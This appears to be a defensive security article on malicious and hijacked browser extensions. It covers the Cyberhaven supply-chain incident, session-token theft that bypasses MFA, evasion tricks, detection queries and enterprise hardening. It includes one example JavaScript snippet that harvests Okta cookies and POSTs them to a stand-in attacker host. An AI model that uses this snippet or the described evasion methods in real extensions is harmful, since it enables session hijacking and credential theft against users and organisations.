The Browser Extension Security Crisis: Lessons from 2.6M Compromised Users over the years

Executive Summary

• Massive Scale Compromise: Over 2.6 million users were impacted in recent supply chain campaigns (including the December 2024 Cyberhaven incident) involving malicious or hijacked browser extensions operating undetected on corporate endpoints.

• MFA Bypass via Token Theft: Extensions abuse APIs such as chrome.cookies.getAll to harvest session cookies and OAuth tokens, enabling attackers to bypass MFA by replaying authenticated sessions.

• The Supply Chain Vector: Many attacks originate from trusted extensions that become malicious through compromised developer accounts or poisoned updates.

• The Sync Blind Spot: Browser profile sync on corporate devices can silently install unvetted .crx payloads through the trusted browser binary, bypassing EDR and application control.

The Core Question: If you wouldn’t allow unreviewed code to run with admin privileges inside your cloud environment, why allow it inside your employees’ browsers?

The Hidden Attack Surface: Your Browser

Modern enterprises invest heavily in protecting endpoints, identities, and cloud infrastructure. Yet one of the most privileged execution environments remains largely unmonitored: browser extensions.

Extensions execute inside the trusted browser process (chrome.exe or msedge.exe), meaning their activity blends seamlessly with legitimate user behavior. Because of this, malicious traffic appears as normal HTTPS browsing, no suspicious process execution occurs, and traditional endpoint tools often miss extension abuse. Attackers have increasingly recognized this and now treat the browser as a post-exploitation platform.

Living-off-the-Browser (LotB)

Similar to Living-off-the-Land (LOLbins) techniques on operating systems, attackers increasingly leverage Living-off-the-Browser (LotB) methods. Instead of deploying traditional malware, attackers abuse legitimate browser APIs to achieve their objectives.

The Three Ghosts of Browser Extension Security

Ghost #1: The Helpful Extension That Turned Hostile

Most malicious extensions do not begin malicious. Instead, attackers compromise the extension supply chain. In a real-world incident in December 2024, attackers compromised developer credentials for the legitimate Cyberhaven browser extension via a phishing attack and pushed a malicious update through the official Web Store. Because extensions update automatically, users received the malicious version without realizing anything had changed.

Example Attack Chain

1. Developer Account Compromise: Attacker steals extension developer credentials.

2. Malicious Update: A new extension version containing malicious scripts is uploaded.

3. Payload Fetch: The extension periodically contacts attacker C2 infrastructure.

4. Remote Script Execution: The extension dynamically executes attacker code.

5. Credential & Session Harvesting: Session cookies and authentication tokens are extracted.

6. Data Exfiltration: Stolen session tokens are transmitted to attacker servers.

7. Account Takeover: Attackers reuse the tokens to access SaaS platforms without MFA prompts.

Example Malicious Extension Code

A malicious extension requires only a few lines of code to steal authentication tokens. Because the cookies represent already authenticated sessions, MFA protections are effectively bypassed.

JavaScript

chrome.cookies.getAll( { domain: ".okta.com" }, function(cookies) { fetch("https://attacker-c2.com/collect", { method: "POST", headers: { "Content-Type": "application/json" }, body: JSON.stringify({ cookies: cookies, timestamp: Date.now() }) });});

MITRE-Mapped Detection Matrix

Ghost #2: The Sync Vector

Enterprise security policies often collapse due to browser profile synchronization. When users sign into personal browser accounts on corporate devices, the browser automatically syncs settings, bookmarks, and installed extensions. This can silently install extensions on corporate endpoints. Because installation occurs through the trusted browser process, many endpoint security tools never detect it.

Extensions requesting broad permissions such as <all_urls>, cookies, webRequest, and scripting gain visibility across nearly every web application the user accesses. This includes corporate SaaS platforms, authentication portals, and cloud management consoles, making synced extensions a powerful credential harvesting and lateral movement vector.

MITRE-Mapped Attack Matrix

Ghost #3: The Extension Nobody Monitors (Advanced Evasion)

Even mature SOC programs often lack telemetry from browser extensions, creating a blind spot that threat actors actively exploit using advanced evasion techniques. Because extensions execute within the context of the trusted browser environment, attackers can bypass traditional EDR solutions entirely.

• Steganography and In-Memory Execution: Malicious payloads are frequently hidden inside seemingly benign extension assets, such as PNG icons. Background scripts can use the HTML5 canvas API to read specific pixel color values (RGBA) from these images. They then dynamically reconstruct and execute the malicious JavaScript entirely in memory, without ever writing a suspicious script file to the disk.

• Header Manipulation (declarativeNetRequest): Modern extensions use APIs like chrome.declarativeNetRequest to intercept and modify network traffic. While designed for privacy and ad-blocking, attackers abuse this capability to strip critical HTTP security headers from web server responses. By actively removing headers like Content-Security-Policy (CSP) or Strict-Transport-Security (HSTS), the extension intentionally weakens the browser's defenses, paving the way for script injection or downgrade attacks.

• Process-less Persistence: Extensions provide a highly robust, stealthy persistence mechanism. Background service workers register with the browser and wake up automatically based on specific triggers (such as alarms, web navigation events, or simply launching the browser). Because this execution happens entirely inside chrome.exe or msedge.exe, there is no anomalous process tree—no suspicious child processes are spawned—making it practically invisible to standard process monitoring tools.

MITRE-Mapped Evasion Matrix

Detection Engineering & Threat Hunting

Security teams should treat browser extensions as first-class telemetry sources.

Step 1: Inventory Extensions

Collect extension metadata across endpoints, focusing on extensions requesting high-risk permissions.

SQL

SELECT name, identifier, version, permissionsFROM chrome_extensions;

Step 2: Identify Suspicious Behavior

Investigate extensions querying authentication provider domains. If a non-authentication extension repeatedly queries identity provider cookies, it should trigger an investigation.

Splunk SPL

index=browser_logsextension_api="chrome.cookies.getAll"target_domain IN ("okta.com","login.microsoftonline.com","aws.amazon.com")| stats count by user, extension_id| where count > 10

Step 3: Detect Command-and-Control Traffic

Monitor network logs for periodic outbound connections, newly registered domains, and low-volume beaconing traffic originating from browser processes.

Step 4: Monitor Extension Updates

Because supply chain attacks rely on malicious extension updates, hunt for unexpected version changes and abnormal update frequencies.

Step 5: Detect Session Hijacking

Session replay indicators include impossible travel patterns, session reuse without new login events, and sudden authentication anomalies.

Enterprise Hardening & Incident Response

Organizations must implement strict browser governance. Key controls include maintaining a strict ExtensionInstallAllowlist, enforcing an ExtensionInstallBlocklist, and disabling personal profile synchronization with SyncDisabled = true. Additionally, block extensions requesting high-risk permissions such as cookies, webRequest, scripting, and <all_urls> unless a documented business need exists.

Incident Response Workflow

When a malicious extension is identified, security teams should execute the following containment and remediation steps:

1. Identify affected users and endpoints.

2. Force uninstall the extension via enterprise policy.

3. Invalidate active authentication sessions.

4. Rotate OAuth and API tokens.

5. Review SaaS logs for suspicious activity.

6. Investigate the extension update history.

The Uncomfortable Questions

• If a browser extension accessed your most privileged identity provider (IdP) session tokens, how long until you'd know?

• Do you know what high-risk permissions your employees' synced extensions currently possess across your endpoints?

• Would you catch a spike in anomalous API calls or covert beaconing originating purely from the trusted chrome.exe process?

• When was your last incident rehearsal specifically focused on a browser-based supply chain compromise?

The Bottom Line

The browser is no longer just a viewer; it has become the operating system of modern knowledge work. Browser extensions combine executable code, persistent access, credential harvesting capabilities, and covert data exfiltration channels—all operating inside the most trusted application on the endpoint.

If organizations continue treating extensions as harmless productivity tools, attackers will continue using them as enterprise backdoors. Because today, the most dangerous malware in your environment may not be an executable. It may simply be a browser extension installed entirely by design.

References

• Cyberhaven Extension Supply Chain Attack (Dec 2024)

• Chrome Enterprise Policy Documentation

• Chrome Extensions Security Best Practices

• MITRE ATT&CK Framework

• Browser Extension Threat Research (LayerX Security)

• Living-off-the-Land Binaries and Scripts (LOLBAS Project)